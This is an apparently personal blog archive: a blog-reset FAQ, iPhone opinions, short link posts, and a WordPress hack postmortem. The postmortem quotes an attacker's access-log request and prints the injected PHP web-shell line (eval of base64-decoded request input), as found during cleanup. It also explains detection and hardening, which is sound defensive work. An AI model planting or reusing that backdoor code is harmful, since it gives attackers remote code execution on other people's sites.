On the Subject of a Blog Reset, as a Series of Questions

Q: I thought you abandoned your blog in 2013 for twitter.

I did! And I’ve felt insanely guilty about it ever since.

Recently, however, I’ve been having more conversations on twitter where the 140-character limit is, well, limiting. I’ve found it frustrating to make any kind of a complex argument across a tweet thread, even with linked conversations. Some thoughts need more room.

I’ve also wanted for some time now to get back into the habit of writing for fun. The full-time day job I had until recently was sucking up a lot of my writing energy, and I’ve done very little writing in the last bunch of years that wasn’t job-related, or 140 characters or less.

But I recently left that day job, now is as good a time as any for a full-on blog reset.

Q: What happened to blog.lauralemay.com?

Ages ago I set up my blog on a separate subdomain from my “main” site, and I can’t remember why. It seemed like a good idea at the time, maybe?

Having two different sites ended up being more annoying than I had intended. For one thing, I was trying to maintain two entirely different wordpress installs, with separate themes and plugins. (Yes, I know about WP multisite, and at the time I could not get it to work. LS;B (Long story, boring)).

With the reset I have merged everything back into www.lauralemay.com and a single wordpress install. The blog.lauralemay.com site still exists but I’m planning to put in a redirect once things here have settled down.

Q: I can’t believe you’re still using WordPress when you got so badly hacked, repeatedly, in the past. What’s wrong with you?

This is really a case of “better the devil you know.”

My original plan for a new blog had been to set up something simpler, easier to understand, and less prone to hacking problems than WordPress.

I spent a couple months earlier this year down a rabbit hole of learning all about static site generators (like Jekyll and Pelican and Hyde) for just this reason.

But the deeper into that rabbit hole I got, the more I realized how much work it was going to be to modify any static site software to output the design and structure and functionality I wanted. The time investment was going to be way more than I was willing to spend given that the actual goal was to write more, not spend more time working on software, or being my own sys admin.

WordPress has its issues, and I’ve seen a lot of them, but I understand it fairly well at this point. Also the community around themes and plugins is so rich that using WordPress gives you a huge step up in building a blog-like site versus starting everything from scratch.

Q: Yes, OK, but the hacking thing?

I figured out the hacking thing. If you put wp-login.php and the entire wp-admin directory behind access control (I use .htaccess) then the hacking stops. My old blog (and my old site) have been locked down like this for three years and I have had no further issues at all. (This is not a challenge.)

Q: You don’t have comments enabled. When are you going to turn comments back on?

I’m not. I did leave the old comments in place on my old blog posts because it felt weird to just delete them. New posts do not have comments, and won’rt.

Even on a blog as little-read as this one just managing spam in the comments was a pointless time sink. Replying to and managing actual real-life comments was also a lot less fun than I had thought it would be. At best I feel like I’m not keeping up, and guilty for not engaging better. At worst there are seemingly endless numbers of blowhards who use my comments to lecture or “well-actually” me, or to argue at length about things only semi-related to my actual posts. There are plenty of places to have an opinion on the Internet. This is mine. Get your own blog.

I am easily found on twitter or email if you really want to talk to me about something I’ve written.

Q: Are you going to talk endlessly about octopus and chickens all the time like you did before?

Yes! Also food, and cooking, and gardening. No links (those go on twitter). More personal stuff. And (I hope) much shorter posts rather than the 20-page essays and the immense multipart sagas I was doing before. (This post so far is not a good start.)

You will also occasionally see a post about technical writing, which is what I do for a living and a subject I feel strongly about (Yes, I know, I am strange). I am still figuring out the right way to categorize different subjects in the same blog, so we’ll see.

Titles will be properly uppercased this time around as well.

Q: Your ideas are intriguing to me and I wish to subscribe to your newsletter.

My new RSS feed is at http://www.lauralemay.com/feed. A blog-only feed (no pictures, links, tweets or other stuff sucked in from elsewhere) is http://www.lauralemay.com/blog/feed. You can also follow me on twitter for new post alerts.

In Which Laura Discovers Internet-Based Home Automation

Belkin WeMo: Control home electronics from your smart phone

L: OMG I want this!

E: Now you never need to look up from your smart phone to interact with the environment.

L: I was thinking it would be helpful for things like “did I forget to turn off the espresso machine again…”

E: Yeah…

L: Also, it is a $50 gadget that can replace a perfectly good $2.99 lamp timer! Who wouldn’t want that!

E: You can integrate it with your social media. Annoy your facebook friends with “Eric turned on the lamp! Eric turned off the lamp!” updates. It’s better than Farmville!

hacked, the followup

(I am getting a lot of hits on this post from google. If you came here because you think your wordpress install has been hacked as well, make sure you also read Hacked! and Hacked, Again!)

I’ve done nearly all the design updates I’m going to do to the blog for now although I have a plenty large To Do list left. Sadly it’s an almost entirely different To Do list than I had before this mess happened.

This is my technical followup to what happened; you can skip it if you don’t care about the details. It is long (of course). I’ll get back to talking about chickens and food soon enough.

We ended yesterday with a complete reinstall of all the files on all my web sites, including a brand new version of WordPress and a new database for this blog. In retrospect, this is what I should have done straight off on monday. The #1 thing I have learned from this is when in doubt, assume it is WordPress and nuke it from space.

Notes on WordPress Security

I’m 99% sure that my hacker got into WordPress via a script called timthumb. This is a known WordPress vector for abuse — tons of themes and plugins use this script. In my case it was my theme, Thesis, that used it. This timthumb page has a lot of technical detail about why it is a problem, although the phrase “allowing hackers to upload and execute arbitrary PHP code” generally says it all.

There is a WordPress plugin called Timthumb Vulnerability Scanner that will check your entire WordPress installation for old versions of timthumb and made sure you are not subject to this hack. Note that I was using a current version of a respected paid theme and the most recent version of WordPress and the timthumb vulnerability was still there.

I also use the wp-security plugin for general WordPress security, which encourages you to make some of the more obvious changes to wordpress to keep hackers out (removing the admin account, renaming your database tables, etc.). I admit I had not implemented everything that wp-security recommended, because I was lazy. But even if I had it would not have helped with the timthumb hack.

The makers of wp-security have a web site called Website Defender that does much more in-depth security testing of your installation. I hadn’t gotten around to signing up for or installing the Website Defender tools (it requires some PHP to be placed on your web site, which, frankly, worried me right there). But a few people on twitter recommended it, so once I got my new software installed I set it up, and it looks MUCH more comprehensive for protecting WordPress. I kind of consider it anti-virus software for WordPress. They can keep track of new vulnerabilities so I don’t have to.

Lurking Horror in Non-Static Static HTML

I had been worried yesterday that my hacker was somehow able to modify files in my static HTML sites (my www.lauralemay.com and work.lauralemay.com sites) from the hacked WordPress blog site. This led me to believe that I actually had a worse hacker than just a web-based script-kiddie. It turns out I was wrong. PHP was the problem, and I had PHP everywhere that I just didn’t know about or wasn’t paying attention to. This was my fault for not being more diligent.

In the case of my www site, I once ran Movable Type there, and although I had turned off the itself software years ago I still had the files sitting around in the directory and accessible from the web. Tons of PHP floating around in there. This was dumb of me to keep around — especially since it was a very old version of Movable Type.

I was sure that my work site was safe — I wrote all that myself, in plain HTML and CSS. And then buried deep in a sub-sub-sub directory I found one PHP file that Dreamweaver of all things had written as part of “design notes” for the site. I know there was one time I used DreamWeaver for the site but it was years ago and I thought I had long since deleted all those extra notes directories. ONE FILE I didn’t even know was there, but the hacker scripts found it, and that was all it took. (Fortunately all I had to do was trash that one file and that was the end of it.)

I See You

While I was sitting around waiting for stuff to install and reimport and whatnot I got to thinking that maybe there were traces of my hacker in my access and error logs. Fortunately this is not a high-traffic web site (hah), so I could grep out typical requests and page through the rest of my logs without having to look at a zillion lines. A whole lot of lines like this one immediately stood out:

46.37.184.254 - - [04/Jan/2012:03:10:38 -0800] "GET /wp-admin/includes/schema.php?
img_id=1f3870be274f6c49b3e31a0c6728957f&mod_content=ZWNobyAiZ29vZ2xlZWVlIjs= 
HTTP/1.0" 301 572 "http://facebook.com/" "Mozilla/4.0 (compatible; MSIE 8.0; 
Windows NT 6.1; Win64; x64; Trident/4.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 
3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; Tablet PC 2.0; .NET4.0C)" 

I know of no legitimate reason for anyone to request anything inside wp-admin unless they are actually administering the site. There’s especially no reason to request schema.php, and no reason at all to give it arguments (img_id and mod_content). I had a copy of my hacked site on my local machine, and I took a look at schema.php. Bingo. Right at the top of the file, above the comments:

<?php if((md5($_REQUEST["img_id"]) == "ae6d32585ecc4d33cb8cd68a047d8434")
&& isset($_REQUEST["mod_content"])) { eval(base64_decode($_REQUEST
["mod_content"])); exit(); } ?>

eval(base64_decode you say? I don’t think so. I searched my entire blog site, and found about ten PHP files all over the place that had these lines scribbled at the start. Then I looked through my log files and there was my hacker, always at the same IP address, always pinging those same hacked files.

None of this actually really mattered, since I had trashed all the hacked filed when I reinstalled WordPress. But one of the first things I did when my new site was set up was to block that IP address. And today as I watch my logs roll by I am pleased to see client denied by server configuration coming up again and again.

Feeeelings

I’m not feeling the least bit confident about web software right now, and thinking about the security problems of complex web applications in general is making me break out in hives. It seems that the more complex a web app is the more likely it is that someone out there is going to fuck with it, and I just don’t have the time for that. I went to shared hosting precisely because I was tired of being my own sys admin. I can do it, but I’m not all that good at it, and I don’t want to. I want to write.

On the other hand, the idea of giving up all the administration and putting all my stuff in the cloud also doesn’t give me happy warm fuzzies. Because of course in that situation the cloudmasters are hadooping away on everything I do and generating all sorts of valuable advertising thneeds.

Either way it seems I’m eventually going to be pwned by someone.

grumble.

hacked!

(I am getting a lot of hits on this post from google. If you came here because you think your wordpress install has been hacked as well, make sure you also read Hacked, Again! and Hacked, the Followup)

So, I had a fun afternoon, how about you?

A week or so ago, I noticed an odd thing: Google Reader had stopped updating my blog feeds. Around that time I had been mucking with the blog feeds (see Housekeeping) so I figured maybe I had confused Google Reader, and if I ignored it, maybe it would go away.

Hint: if Google gets annoyed at your web site, perhaps there is something wrong with your web site.

Then yesterday I noticed that if I unsubscribed to my blog feed in Google Reader and resubscribed to it, the title to my blog would not come up. Instead Google Reader decided the title was “Personal Creations Elmo, Consumer Payday Loans – $300 – $2500.”

I became indignant. My blog looked fine to me. It looked fine from a variety of other locations. The code looked fine if I grabbed it with curl. Something was wrong with Google.

Hint: It’s unlikely something is wrong with Google. Something might be wrong with your site.

Then it got worse and it spread to my search results:

Googlesearch

At the same time a friend sent me a screen shot of my web site as he saw it:

Screenshot 5 1

Yeah, I got hacked. But it was a selective hack; only the google and yahoo crawlers and referers from google and yahoo saw it. (no one actually uses the Yahoo search engine.)

I spent the day cleaning up from this hack, including doing it twice because it came back. I still don’t know where it came from or if its going to come back again. This was not a lot of fun.

I googled what I found and turned almost no information at all; no exploits, no descriptions, no patches, nothing. I don’t know if what I had was new, or if it was obscure, or what. Technical details in the More part of this post. Continue reading

why I am not buying an iPhone

Update: Damn, this is a popular post. I am replying to comments below but I should note that I am not an iPhone expert. I have no special knowledge. I’m watching the news and the videos and reading the blogs like everyone else is. If you’re here looking for iPhone information consider the page on the iPhone on wikipedia which has collected a lot of what is currently known about it. Keep in mind also that there’s a whole lot that ISN’T known and won’t be known until the iPhone is released on friday and people actually take it apart and play with it.

Please note also that if you spam my blog with iPhone questions you’ve asked on every other blog that mentions the iPhone I will delete you. That’s really rude.

I’ve been asked a lot over the last week if I am going to be buying an iPhone, and twice if I’m going to be camping out to buy an iPhone. For some reason, I can’t imagine why, she said, innocently, I seem to have acquired the reputation for being kind of a cell phone freak.

I am not going to buy an iPhone, at least not this version. I am not an iPhone Hater, as those who lust for the iPhone are caling the doubters, but I personally feel little iPhone lust. My reasons:

  • The virtual keyboard. I’m a heavy smartphone keyboard user; I am a double-thumb typer and I rely on the feel of the keys to type fast and accurately. The word on street so far is that the iPhone’s virtual keyboard takes some getting used to but is not as bad as it looks, especially if you trust the error correction to work for you. I would like to see it for myself, and I would like real people to use it for a while and to express real world opinions (can the blackberry people use it? That’s what I want to know). I’m also suspicious that any virtual keyboard will ever be as comfortable to type on as a real keyboard with pressable keys. I have a hell of a time with real full size keyboards that do not have good tactile feedback — the joints in my hands hurt. Given how often I type and my experiences over the years with stress injuries in my hands this is something I pay attention to. I do not want a phone that will land me in physical therapy, no matter how cool it is.
  • The slow data connection. I was stunned when I heard in the original iPhone announcement that they were going with an EDGE cell connection. AT&T has a fast HSDPA 3G network in most major markets — I cannot comprehend why they didn’t use it. Apple seems to be blithely assuming that you can drop down to wifi at any time and then the connection will be speedy but as someone who has had a wifi phone for the last year I can assure future iPhone users that free and open wifi connections are not as ubiquitous as you might think, even in major urban areas. You will have to rely on EDGE, and EDGE is slow. I have EDGE with T-mobile and it is acceptable if you’re patient, but you have to be very patient. If you’re used to broadband or an EVDO connection it is going to drive you nuts.
  • I hate AT&T. OK, I hate all cell carriers. They are all evil. AT&T is perhaps more grossly incompetent and money-grubbing than sheer evil, but AT&T is still a big vote for iPhone: NO right there. It’s going to take an awful lot to get me to sign up with AT&T, especially with a two-year contract, although now that they’ve announced the iPhone plans and they are remarkably simple and not stupidly named (you have the “Elbows Landscape plan with My Hazelnuts”) I’m a bit less suspicious. To be fair, I would probably have precisely this same argument with any carrier at all, including T-Mobile where I am now.
  • $500+ for a phone no one has even seen. Speaking as someone who spent $500 on a phone last year that I hadn’t even seen this may seem like an odd complaint. I spent full retail on an unlocked, untethered phone, and I would do it again. I didn’t spend $500 on a phone that would also lock me into a $2000 long term contract with a carrier whose service I know isn’t all that great.
  • It is a first generation Apple device. I have had on-and-off experiences with first generation Apple devices; My first generation PowerPC mac was a complete mess; my first generation iPod was replaced once under warranty and broke again a few months later; my first generation 12″ powerbook was rock solid for its entire useful life and I loved it so much I bought another one. The iPhone is new enough in a variety of ways — and cell phones are integral enough to my life that I would really hurt if it broke — that I think I’ll sit out the first generation.
  • It’s just not that huge a revolution right now. It is an absolutely beautiful phone. The interface is gorgeous and there are obviously some really new ideas in interaction design there that are truly fascinating. Once the crowds in the stores die down I will be there in the Apple Store playing with it. I can definitely see buying one later on. But now? I have email and the web and Google Maps and text messaging on my phone. I have a camera and music. And I also have video and games and third-party applications. The interface isn’t as pretty on my Nokia. The screen is really small. The apps could be better designed and more useful. But its good for now.

I’ll wait.

In the meantime I do seem to have accidentally acquired a Nokia Internet Tablet. Its a wifi-based web browser and email device with a big high resolution screen that runs linux. I’m not exactly sure what came over me there.

very, very well documented

And while I’m on the subject of documentation, here’s a great story from the former The Daily WTF.com, now known (sadly) as WorseThanFailure.com, called Very, Very Well Documented.

George’s contact at the Air Force was a gruff, old general with a vast knowledge of aerial warfare and forty years experience in the service. Naturally, he was very skeptical of the new guys’ ability to develop a ‘military grade’ product.’ After all, they hadn’t spent a single day in uniform. But George’s team quickly won him with a demonstration: one month after being awarded the contract, they had fully replicated the prototype plane’s specifications in their software. [..]

‘Gentlemen,’ the general started during one of their wrap-up meetings, ‘you have done very well. I am very impressed. There is, however, one problem. You did not provide nearly enough documentation.’ […]

‘You see gentlemen,’ the general continued, ‘for such expensive program, we require at least eight meters of documentation.’ He stretched his arms as far as he could to illustrate. Clearly, he was not joking.

(read the rest of the story)

(I got it from The Daily WTF.)

the true story of the emu press

A long time ago here I posted about the manual for the MN-156 Reciprocating Emu Press, which was mysteriously stored on Amazon’s media servers. I ended that post wondering what the real story was behind this amusing parady of a user manual.

A while ago mad_eponine, the author of the Reciprocating Emu Press manual, sent me email pointing me to this livejournal post with the real story, including how it ended up at Amazon. It is brilliant. I am happy to have played a small role in the saga.

iphone user’s guide

The iPhone, a User’s Guide (McSweeney’s)

I . Introduction
II. Turning on the iPhone
III. Making a call using the iPhone

XI. Using the iPhone to explain how the internal board committee of Apple Computer Inc. (before the name change) headed by Al Gore could exonerate Steve Jobs of any wrongdoing in the options-backdating scandal

XVII. Using the iPhone to assist Nicole Kidman in playing a frankly commercial Mrs. Coulter in the new adaptation of The Golden Compass without losing the anti-Miltonian vibe or the stuff about the Magisterium

XIX. Using the iPhone to learn whether Ehud Barak ever considered adopting Barack Obama and changing the Illinois junior senator’s name to Barack Barak

kathy sierra, or, imminent death of the net predicted

I’m coming in late to comment on the Kathy Sierra situation. The wail of shock and anguish that passed over the internet about it has started to subside, and there’s already been a whole lot (a WHOLE lot) said on the topic.

If you missed it, here’s the story: Kathy Sierra, co-creator of the Head First line of computer books and one of my favourite writers, has been receiving death threats and harassment on her blog and elsewhere on the net. Because of it she cancelled her keynote and tutorials at Etech and was considering giving up blogging altogether. She talked about it on her blog in a post titled Death threats against bloggers are NOT “protected speech” — warning, there are some disturbing words and images here, and there are over 1000 comments so its very long to load.

This, in turn, is a very long post and not what I usually write about on this blog, so see more after the jump. (feed readers and livejournallers, you probably know by now that you get the whole thing and there is no “jump”).

Continue reading